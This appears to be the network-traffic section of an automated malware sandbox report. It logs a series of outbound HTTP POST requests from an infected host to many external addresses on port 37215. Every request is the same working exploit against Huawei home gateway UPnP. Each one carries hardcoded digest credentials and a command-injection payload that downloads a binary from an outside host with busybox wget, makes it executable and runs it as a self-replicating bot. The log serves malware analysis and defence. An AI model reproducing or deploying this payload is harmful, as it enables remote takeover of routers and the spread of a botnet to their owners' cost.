                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          489192.168.2.2349814197.46.169.16037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191915035 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          490192.168.2.233451677.109.150.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191955090 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          491192.168.2.2351890157.28.30.21737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191957951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          492192.168.2.234402241.5.93.8137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.191967964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          493192.168.2.2353970202.145.87.24137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195115089 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          494192.168.2.2333770153.132.151.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195151091 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          495192.168.2.2351974160.124.31.4637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195157051 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          496192.168.2.2353444157.88.243.18737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195228100 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          497192.168.2.233314635.236.4.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195242882 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          498192.168.2.2354746197.11.95.9137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.195286036 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
